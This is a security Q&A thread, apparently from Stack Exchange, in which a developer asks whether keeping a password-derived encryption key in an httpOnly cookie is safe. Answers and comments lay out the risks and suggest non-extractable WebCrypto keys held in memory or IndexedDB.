2

I'm making a web application on the MERN stack which stores sensitive user data, in the form of a big block of text.

The encryption method I am using is that when a user registers, a random key is generated (generated key), and using another key that is derived from the user's password using PBKDF2 (derived key), I use the derived key to encrypt the generated key and store that new key (encrypted key) in the database.

The sensitive data will be encrypted/decrypted by pulling the encrypted key from the database, decrypting it using the derived key (remember, the derived key is a hashed version of the user's password, not stored in the DB) which results in the originally generated key which we can finally use to encrypt and decrypt the data.

The issue I'm running into now is, this is only secure if the user has to log in every time they open or refresh the page; since we need to prompt them for their password in order to get the derived key.

I'd like to add some convenience here, and instead of making them log in every session I want to persist this derived key somewhere on the browser.

I know localStorage is prone to xss, and cookies are prone to csrf. I'm leaning towards keeping the derived key in a httpOnly, strict sameSite cookie which I think may be the best I could hope for in terms of security.

Is this line of reasoning correct, or am I about to create some big vulnerability? If so, are there any recommendations or do I just need to log them in every time they refresh the page?

2 Answers 2

1

There are several major issues with using cookies to store the derived key.

  • You cannot control how long the cookie will remain in the browser. If you use the Expires or Max-Age attribute, this only defines when the browser should stop sending the cookie. The exact time when the cookie will be removed is browser-specific. If you use a session cookie, it's completely up to the browser to decide when the “current session” ends.
  • Cookies can be read by anybody with physical access to the device, which is obviously a problem for shared devices. Unlike passwords which can be protected with a master password, I believe there's currently no browser which lets you protect cookies in any way.
  • The users aren't aware of how critical their cookies are in your scheme. Even if you explain it to them, I'm not sure if they'll actually understand this and act accordingly (immediately clear the cookies by hand when they're done etc.).
  • Your scheme is highly vulnerable to XSS attacks. Using the HttpOnly cookie attribute only prevents the value from being read with JavaScript. The cookie is still automatically included in requests, so once an attacker has found an XSS vulnerability, they can automatically decrypt anything they want with the key stored in the cookie.
  • Since the key is derived from the user's password, this means it's also possible to perform a brute-force attack against the password once the cookie value is known. PBKDF2 in particular is fairly weak, so this is a realistic attack scenario.

A solution which is somewhat reasonable and still usable would be to turn the application or at least the encryption-related part into a one-page application, so that the key can be temporarily stored in a JavaScript variable. Of course this restructuring can be a lot of effort. It also doesn't solve the problem of XSS, so you'll have to do additional work to prevent this as well (very strict Content Security Policy, consistent use of Subresource Integrity, review of all server-side measures).

An even better solution would be a browser plugin which handles the encryption and key management without any server involvement. Of course that means you'll have to either find or develop an appropriate plugin, and your users have to be willing to install it. I remember a plugin for GPG (GNU Privacy Guard) which lets you encrypt and decrypt text in your browser, but I have no idea how secure the implementation actually is.

3
  • This would help with the first and last problem (undefined lifetime and brute-force attacks against the password). All other problems are still there. And the scheme is becoming more and more complex, which also increases the chance of security vulnerabilities. I'm really not sure if encryption is the right answer here, if the prerequisites for doing it properly aren't fulfilled. Commented Jun 14, 2023 at 4:48
  • Of course the session token will be affected by XSS attacks on any website, but in your case, we're talking about all encrypted data of all users that are victims of the attack. That's the difference: GitHub makes no claim about encrypting any data. If you do, then you'll have to deal with all problems that come with this extra feature. Commented Jun 14, 2023 at 5:20
  • OP, if you decide to store the private key in a javascript variable, then you might want to consider using a web crypto api CryptoKey object to store the key, with the .extractable property set to False. This way, any other javascript that might be running (whether malicious or not) would be unable to access the key stored in the object. See crypto.stackexchange.com/questions/35530/… for more info. Commented Jun 22, 2023 at 16:18
1

You could save non-extractable private key using WebCrypto in IndexedDb. The key itself isn't extractable then, you can only use it for e.g. decryption.

See also: https://crypto.stackexchange.com/a/52488

2
  • Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. Commented Jun 22, 2023 at 9:29
  • 1
    Related: crypto.stackexchange.com/questions/35530/… Commented Jun 22, 2023 at 16:11

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.